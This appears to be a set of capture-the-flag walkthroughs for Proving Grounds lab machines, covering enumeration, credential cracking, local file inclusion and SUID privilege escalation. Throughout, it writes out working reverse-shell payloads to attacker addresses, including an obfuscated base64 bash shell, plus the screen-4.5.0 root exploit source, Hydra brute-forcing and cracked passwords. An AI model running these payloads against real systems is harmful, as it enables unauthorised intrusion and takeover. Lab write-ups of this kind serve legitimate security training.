pg-funboxrookie-play

Exploitation Guide for FunboxRookie

Summary

This machine is exploited with an anonymous FTP server containing file id_rsa and then the disclosure of user credentials in a history file. It is escalated via open sudo that allows the user to run any command with elevated privileges.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.120.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:07 EDT
Nmap scan report for 192.168.120.138
Host is up (0.032s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

We can run a more detailed nmap scan with the -sC flag against the discovered ports:

kali@kali:~$ sudo nmap -p 21,22,80 192.168.120.138 -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:09 EDT
Nmap scan report for 192.168.120.138
Host is up (0.030s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works

The FTP server listening on the default port allows for anonymous logins, and we see several zip files listed.

Exploitation

Anonymous FTP Server

Of the files shown in the scan, only file tom.zip will prove useful to us. Next, we can log in and retrieve it:

kali@kali:~$ ftp 192.168.120.138
Connected to 192.168.120.138.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.120.138]
Name (192.168.120.138:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.118.3 !
230-
230-The local time is: Wed Oct 14 17:11:13 2020
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.00 secs (28.1715 MB/s)
ftp> bye
221 Goodbye.
kali@kali:~$ 

However, if we try to open the archive, we will find that it is password-protected.

Password Bruteforce

We can use zip2john to convert the encrypted archive to a hash file usable by john:

kali@kali:~$ zip2john tom.zip > tom.hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6
kali@kali:~$

We can now use john and the rockyou.txt wordlist to crack the password:

kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2020-10-14 13:17) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~$

The cracker succeeds and reveals that the password is iubire. Using it, we can unlock the archive:

kali@kali:~$ unzip -P iubire tom.zip
Archive:  tom.zip
  inflating: id_rsa

kali@kali:~$

We have obtained a private SSH key file id_rsa.

SSH

Since we have obtained the private key from the archive tom.zip, we can assume that the user is named tom. Next, we will set proper key file permissions and then SSH to the target:

kali@kali:~$ chmod 0600 id_rsa
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138
...
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$

Escaping Restricted Shell

But, if try to change directory or any of the other restricted commands, we will find that our default shell upon login is rbash, which we must first escape:

tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
-rbash: cd: restricted
tom@funbox2:~$

There are many ways to do so, and we will choose one of the easiest ones (exiting the current shell and then reconnecting with the flag -t "bash --noprofile"):

tom@funbox2:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.120.138 closed.
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138 -t "bash --noprofile"
load pubkey "id_rsa": invalid format
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
tom@funbox2:/home$

We are now able to traverse and enumerate the system further.

Escalation

User Password Recovery

Looking around the user’s home directory, we find a MySQL history file:

tom@funbox2:/home$ cd ~
tom@funbox2:~$ ls -la
...
-rw------- 1 tom  tom   295 Jul 25 12:04 .mysql_history
...
tom@funbox2:~$

In this file, we see the history of several MySQL commands:

tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$

The command insert\040into\040support\040(tom,\040xx11yy22!); looks very interesting as it contains string xx11yy22! that looks like a password.

Sudo Escalation

Trying the password for the user to enumerate sudo privileges works, and we see that user tom is actually able to run any command with sudo, providing the password:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$

We can easily use this to get a root shell:

tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom#

pg-dc5-play

DC5

Nmap
sudo nmap 192.168.184.26 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
38106/tcp open status 1 (RPC #100024)

Port 80 on the target machine take us to the following web page. Multiple sub pages include non-english text and after translating random paragraphs found this is mostly gibberish.

Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.

feroxbuster –url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php

Checking out contact.php and it appears to be the only page to take some form of input.

After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.

At this point I decided to test thankyou.php? for command injection. I caught the request in Burpsuite and sent it to intruder. I then set the payload variable as below.

I then added the command injection list as shown below as the payload.

cmd=../../../../../etc/passwd
?exec=../../../../../etc/passwd
?command=../../../../../etc/passwd
?execute../../../../../etc/passwd
?ping=../../../../../etc/passwd
?query=../../../../../etc/passwd
?jump=../../../../../etc/passwd
?code=../../../../../etc/passwd
?reg=../../../../../etc/passwd
?do=../../../../../etc/passwd
?func=../../../../../etc/passwd
?arg=../../../../../etc/passwd
?option=../../../../../etc/passwd
?load=../../../../../etc/passwd
?process=../../../../../etc/passwd
?step=../../../../../etc/passwd
?read=../../../../../etc/passwd
?function=../../../../../etc/passwd
?req=../../../../../etc/passwd
?feature=../../../../../etc/passwd
?exe=../../../../../etc/passwd
?module=../../../../../etc/passwd
?payload=../../../../../etc/passwd
?run=../../../../../etc/passwd
?print=../../../../../etc/passwd
?file=../../../../../etc/passwd

Ensure URL encoding is turned off as this was causing incorrect results as it was encoding '?'.

Viewing the results of the payload after show that the ?file= parameter appears to be vulnerable due to the content length being greatly different form the other values.

Viewing this in the browser shows us valid results.

We can fuzz for further files using wfuzz and the command below:

wfuzz -c -w lfi.txt –hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ

The LFI list can be downloaded from here

LFI list
lfi.txt – 29KB

We have two interesting LFI paths found once wfuzz completes:

/var/log/nginx/access.log
/var/log/nginx/error.log

Checking out access.log we can see requests we have made.

We can capture a request in Burpsuite and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.

Where the code snippet below is used for the RCE:

<?php exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.211 80 >/tmp/f’) ?>

With a netcat listener listening we can then access the log files again at: http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log

When we attempt to load the log files the page should hang and we get a reverse shell.

Searching for SUID commands on the machine find the binary screen-4.5.0 has the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Researching on Google shows a local privilege escalation exploit for this binary version.

exploits/screen2root at master · XiphosResearch/exploits
Miscellaneous exploit code. Contribute to XiphosResearch/exploits development by creating an account on GitHub.
github.com

We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell.

libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown(“/tmp/rootshell”, 0, 0);
chmod(“/tmp/rootshell”, 04755);
unlink(“/etc/ld.so.preload”);
printf(“[+] done!\n”);
}

Compile libhax.c

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp(“/bin/sh”, NULL, NULL);
}

Compile rootshell.c

gcc -o /tmp/rootshell /tmp/rootshell.c

Create exploit bash script.

exploit.sh
#!/bin/bash
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
echo “[+] Triggering…”
screen -ls

Upload compiled files to target machine.

wget http://192.168.49.211/rootshell
wget http://192.168.49.211/libhax.so
wget http://192.168.49.211/exploit.sh

Once uploaded make the bash script executable:

chmod +x exploit.sh

Execute exploit.sh then after run /tmp/rootshell to gain shell as root.

pg-dawn-play

Dawn

Nmap
sudo nmap 192.168.55.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.

kali@kali:~/dawn$ smbclient -U ” -L \\\\192.168.55.11\\
Enter WORKGROUP\’s password:

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled — no workgroup available
kali@kali:~/dawn$

Connecting then directly to the ITDEPT share.

kali@kali:~/dawn$ smbclient -U ” \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020

7158264 blocks of size 1024. 3518364 blocks available
smb: \>

I then used curl to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later.
kali@kali:~/dawn$ curl –upload-file rev.php -u ” smb://192.168.55.11/ITDEPT//rev.php
Enter host password for user ”:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k –:–:– –:–:– –:–:– 596k
kali@kali:~/dawn$
Running dirsearch.py on port 80 reveals two interesting directories.
python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

Moving into logs shows the a list of logs where management.log is the only one we have permission to access

When reading the log file we have the lines below appearing frequently.

2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control

Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute.

Firstly I created a file called web-control and inserted a netcat reverse shell into it

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.200 9001 >/tmp/f

This was then uploaded to the SMB share.

smb: \> put web-control 
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
. D 0 Thu Sep 2 09:34:20 2021
.. D 0 Wed Jul 22 13:19:41 2020
rev.php A 5496 Thu Sep 2 09:13:41 2021
web-control A 83 Thu Sep 2 09:38:54 2021

7158264 blocks of size 1024. 3518292 blocks available
smb: \>

After doing so I soon receive a shell back on my netcat listener.

kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Next I search for SUID and found a binary zsh as having the SUID bit set.
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
As zsh is a shell binary all we need to do is execute the full path of zsh to gain a root shell.
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id 
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root 
cd /root
dawn# ls 
ls
flag.txt proof.txt
dawn# cat flag.txt 
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt 
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#
.

pg-covfefe-play

Covfefe

Nmap
sudo nmap 192.168.184.10 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp open http nginx 1.10.3
31337/tcp open Elite?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started off with port 80 and was unable to identify any directories or files. The default page for the port goes to installation for nginix.

When attempting to browse to port 31337 we are given a 404 not found error. I then ran dirsearch.py against the port using the command below which discovered what appeared to be a users home directory contents.

python3 dirsearch.py -u http://192.168.184.10:31337 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

Checking out the /.ssh directory appears to list sub folder contents.

I first downloaded the id_rsa and then authorized_keys.

http://192.168.184.10:31337/.ssh/id_rsa
http://192.168.184.10:31337/.ssh/authorized_keys

Viewing the contents of authorized_keys shows the user simon having a key in the file. First use chmod on the id_rsa to set the correct permissions.

chmod 600 id_rsa

When attempting to use the key to connect by SSH we are prompted to provide a passphrase.

Using ssh2john we can convert the key to a hash which can be sent to John for cracking.

/usr/share/john/ssh2john.py id_rsa > /home/kali/Desktop/hash
sudo john –wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash

Now that we have the password starwars for for the key we can try signing in again.

ssh -i id_rsa simon@192.168.184.10

I then transferred over linpeas and executed. Linpeas then identified the binary /usr/local/bin/read_message as having the SUID bit set.

Running the binary and entering the name ‘Simon’ produces the following output:

As per the message we can read the source code. Listing the contents of the root directory shows the source code file.

It looks like as per the script it will read the first 5 characters to validate if correct but, has a total buffer for 20. We can try to overflow the buffer to execute a command.

Running the following when prompted to do so by the binary will give us a root shell.

Simonaaaaaaaaaaaaaaa/bin/sh

pg-bossplayersctf-play

BossPlayersCTF

Nmap
sudo nmap 192.168.152.20 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 shows the following page.

Viewing the source code of this page reveals text at the end.

WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK

We can take this string and run it through base64. We need to perform this three times to reveal a plain text string.

echo ‘WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK’ | base64 -d
echo ‘ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K’ | base64 -d
echo ‘d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==’ | base64 -d

Browsing to workingprogress.php:

/workingprogress.php

Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results.

To create a reverse shell run the following command in a terminal:

echo “echo $(echo ‘bash -i >& /dev/tcp/10.10.14.8/4444 0>&1’ | base64 | base64)|ba”se”6”4 -”d|ba”se”64 -”d|b”a”s”h” | sed ‘s/ /${IFS}/g’

Then take the base64 output and run it as a command in the web browser.

http://192.168.152.20/workinginprogress.php?cmd=echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqRTFNaTg0TUNBd1BpWXhDZz09Cg==|ba%27%27se%27%276%27%274${IFS}-%27%27d|ba%27%27se%27%2764${IFS}-%27%27d|b%27%27a%27%27s%27%27h

This will create a reverse shell connection on our netcat listener.

I then transferred linpeas over from my attacking machine. Shortly after running linpeas finds that the binary ‘find’ has the SUID bit set.

Checking this against GTFOBins shows we can use this to gain a root shell.

Run the following command to spawn a root shell:

/usr/bin/find . -exec /bin/sh -p \; -quit

pg-born2root-play

Exploitation Guide for Born2Root

Summary

Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.

Enumeration

Nmap

We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.

kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39832/tcp6  status
|   100024  1          47504/udp   status
|   100024  1          50443/udp6  status
|_  100024  1          52205/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information.

We should take note of the username martin that appears twice on this page: in the About Us section and in the Contact Us section.

GoBuster

We will use GoBuster to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.

kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...

Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.

kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

Exploitation

Local SSH Access

Let’s give this key proper permissions and then use it to SSH as martin (we can just hit enter when prompted for secret password).

kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born 
...

READY TO ACCESS THE SECRET LAB ? 

secret password : 
WELCOME ! 
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)

Escalation

Local Enumeration

Checking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy.

martin@debian:~$ cat /etc/cron*
...
*/5   * * * *   jimmy   python /tmp/sekurity.py

Reverse Shell

We can copy a Python reverse shell into the sekurity.py file chmod+x sekurity.py and wait 5 minutes for the cronjob to be executed.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.

After a few minutes, we catch our shell:

kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$

SSH Login Brute-Force

Let’s check /etc/passwd to get a list of available users on the system:

jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

The user Hadi stands out as another user also mentioned on the company website.

kali@kali:~$ cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt 
I then used the text file with Hydra to bruteforce SSH which actually worked.

Now we can try brute-forcing the password for the user hadi using Hydra:

kali@kali:~$ hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26

 

We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:

jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Escalation to Root

The password for root was re-used and is the same as hadi‘s: hadi123.

hadi@debian:~$ su -
Password:
root@debian:~# whoami
root

explained

root@debian:/var/spool/cron# cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
THE RABBIT HOLE

The networker binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about go try and deal with that.

Instead, I’m going to go back to my OSCP training

kali@kali:~$ sudo nc -nlvp 80
Password: 
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 *** 
/sbin/ifconfig
/bin/ping -c 1 localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$

.

pg-bbscute-play

BBSCute

Nmap
sudo nmap 192.168.120.128 -p- -sS -sV
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
88/tcp open http nginx 1.14.2
110/tcp open pop3 Courier pop3d
995/tcp open ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to port 80 in the browser lands us on the default install page for Apache.

Running dirsearch.py against the target web servers reveals index.php

python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 –full-url

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding:

/index.php?register

Reviewing the source of this page shows we do have a link for captcha.php.

Viewing this will show what the current captcha should be.

/captcha.php

Entering this into the registration field will allow us to proceed with new user creation.

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with searchsploit shows the results below.

Searching further on Google for exploits we come across a PoC on GitHub located here: https://github.com/CRFSlick/CVE-2019-11447-POC.

